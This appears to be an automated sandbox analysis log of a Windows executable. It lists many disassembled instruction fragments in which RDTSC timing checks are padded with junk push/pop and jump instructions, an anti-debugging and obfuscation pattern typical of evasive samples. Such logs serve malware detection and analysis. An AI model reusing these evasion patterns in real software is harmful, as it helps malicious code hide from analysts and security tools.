Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6C0E7 second address: F6C147 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 ja 00007FD714BB0746h 0x0000000d pop ebx 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FD714BB0748h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c xor dx, F3FDh 0x00000031 pushad 0x00000032 cld 0x00000033 jmp 00007FD714BB0755h 0x00000038 popad 0x00000039 lea eax, dword ptr [ebp+12485C01h] 0x0000003f mov dword ptr [ebp+122D2E7Fh], ecx 0x00000045 nop 0x00000046 pushad 0x00000047 pushad 0x00000048 pushad 0x00000049 popad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6C147 second address: F51D3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007FD714BB3916h 0x0000000c jno 00007FD714BB3916h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FD714BB3921h 0x0000001a nop 0x0000001b mov ecx, dword ptr [ebp+122D2D3Bh] 0x00000021 lea eax, dword ptr [ebp+12485BBDh] 0x00000027 sub ecx, 0BC85EF5h 0x0000002d jmp 00007FD714BB3928h 0x00000032 nop 0x00000033 push edx 0x00000034 jmp 00007FD714BB3923h 0x00000039 pop edx 0x0000003a push eax 0x0000003b jp 00007FD714BB391Eh 0x00000041 js 00007FD714BB3918h 0x00000047 nop 0x00000048 push 00000000h 0x0000004a push ebx 0x0000004b call 00007FD714BB3918h 0x00000050 pop ebx 0x00000051 mov dword ptr [esp+04h], ebx 0x00000055 add dword ptr [esp+04h], 00000017h 0x0000005d inc ebx 0x0000005e push ebx 0x0000005f ret 0x00000060 pop ebx 0x00000061 ret 0x00000062 cmc 0x00000063 call 00007FD714BB3925h 0x00000068 push ebx 0x00000069 pop ecx 0x0000006a pop ecx 0x0000006b call dword ptr [ebp+12455571h] 0x00000071 push ecx 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA60ED second address: FA6110 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD714BB0754h 0x0000000a jne 00007FD714BB0746h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA6438 second address: FA6448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD714BB391Ch 0x0000000a jnl 00007FD714BB3916h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA6448 second address: FA644D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA65B8 second address: FA65CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007FD714BB391Ch 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA65CC second address: FA65FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB074Eh 0x00000007 jnp 00007FD714BB0746h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jl 00007FD714BB0746h 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e pop edi 0x0000001f jnp 00007FD714BB0746h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA65FA second address: FA65FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA65FE second address: FA6609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FA6866 second address: FA6872 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD714BB3916h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAE5AB second address: FAE5C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD714BB0756h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FAE5C7 second address: FAE5CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB2678 second address: FB2691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007FD714BB074Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB2691 second address: FB2695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB2695 second address: FB26AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD714BB0750h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB26AD second address: FB26B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB281F second address: FB2825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB294F second address: FB2971 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD714BB3916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD714BB3926h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB2971 second address: FB2975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB2AF4 second address: FB2B20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB3922h 0x00000007 jmp 00007FD714BB391Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jng 00007FD714BB3916h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB3AA5 second address: FB3AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB3AAB second address: FB3AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB3AB0 second address: FB3AC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD714BB074Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB55BB second address: FB55CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD714BB391Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB55CA second address: FB55CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB55CE second address: FB55D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB55D4 second address: FB55E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FD714BB074Eh 0x0000000c ja 00007FD714BB0746h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB55E8 second address: FB55F4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB837F second address: FB8383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB8383 second address: FB838D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB838D second address: FB83AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007FD714BB0754h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB83AB second address: FB83B1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB7C0D second address: FB7C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB7C1C second address: FB7C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB7C22 second address: FB7C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB7C2B second address: FB7C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB7C31 second address: FB7C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB7C35 second address: FB7C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB7C3B second address: FB7C4F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD714BB074Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB7DAC second address: FB7DB2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FB80A0 second address: FB80AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBF6BC second address: FBF6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBF837 second address: FBF843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD714BB0746h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBF843 second address: FBF852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 js 00007FD714BB3916h 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBF852 second address: FBF857 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBFAEC second address: FBFAF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBFAF0 second address: FBFAF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBFAF8 second address: FBFAFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FBFAFE second address: FBFB04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6BB6E second address: F6BB72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6BB72 second address: F6BBE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jmp 00007FD714BB0754h 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D5763h], eax 0x00000014 mov dword ptr [ebp+122D2B89h], eax 0x0000001a mov ebx, dword ptr [ebp+12485BFCh] 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007FD714BB0748h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a stc 0x0000003b add dword ptr [ebp+122D2B0Dh], eax 0x00000041 add eax, ebx 0x00000043 sub cx, D9D5h 0x00000048 nop 0x00000049 jmp 00007FD714BB074Eh 0x0000004e push eax 0x0000004f push ecx 0x00000050 push ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6BBE7 second address: F6BC10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 nop 0x00000007 movzx ecx, di 0x0000000a push 00000004h 0x0000000c call 00007FD714BB391Ah 0x00000011 mov dword ptr [ebp+122D24C6h], ecx 0x00000017 pop edi 0x00000018 mov ecx, dword ptr [ebp+122D2A40h] 0x0000001e nop 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 pop edi 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6BC10 second address: F6BC14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6BC14 second address: F6BC1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6BC1D second address: F6BC2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FD714BB0746h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6BC2D second address: F6BC46 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD714BB3921h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F6BC46 second address: F6BC4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC096D second address: FC0971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC0971 second address: FC0977 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC39A3 second address: FC39A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC3133 second address: FC3157 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FD714BB0746h 0x00000009 push edx 0x0000000a pop edx 0x0000000b ja 00007FD714BB0746h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 jbe 00007FD714BB0746h 0x0000001d jg 00007FD714BB0746h 0x00000023 pop esi 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC3157 second address: FC316A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD714BB391Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC3426 second address: FC3430 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD714BB074Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC7686 second address: FC768B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC768B second address: FC7690 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC7690 second address: FC76A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD714BB3920h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC76A9 second address: FC76AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FC76AD second address: FC76B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF551 second address: FCF555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCD49D second address: FCD4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD714BB391Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCD4AC second address: FCD4B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCD761 second address: FCD773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007FD714BB3918h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCD773 second address: FCD779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCDA5B second address: FCDA61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCDA61 second address: FCDA68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCDD2F second address: FCDD53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnc 00007FD714BB3916h 0x0000000d jmp 00007FD714BB3926h 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCDD53 second address: FCDD59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCDD59 second address: FCDD5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCDD5D second address: FCDD61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCDD61 second address: FCDD6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCDD6C second address: FCDD8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD714BB0746h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jbe 00007FD714BB074Eh 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCE9F4 second address: FCE9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF264 second address: FCF26E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FCF26E second address: FCF274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD3D6F second address: FD3D7F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jp 00007FD714BB0746h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2BB24 second address: F2BB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2BB28 second address: F2BB3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD714BB0752h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2BB3E second address: F2BB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2BB4A second address: F2BB4F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2BB4F second address: F2BB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jno 00007FD714BB3916h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD339D second address: FD33B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD714BB0750h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD33B3 second address: FD33B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FD33B7 second address: FD33BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDF5D1 second address: FDF5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD714BB3924h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FDF5E9 second address: FDF5F5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD714BB074Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
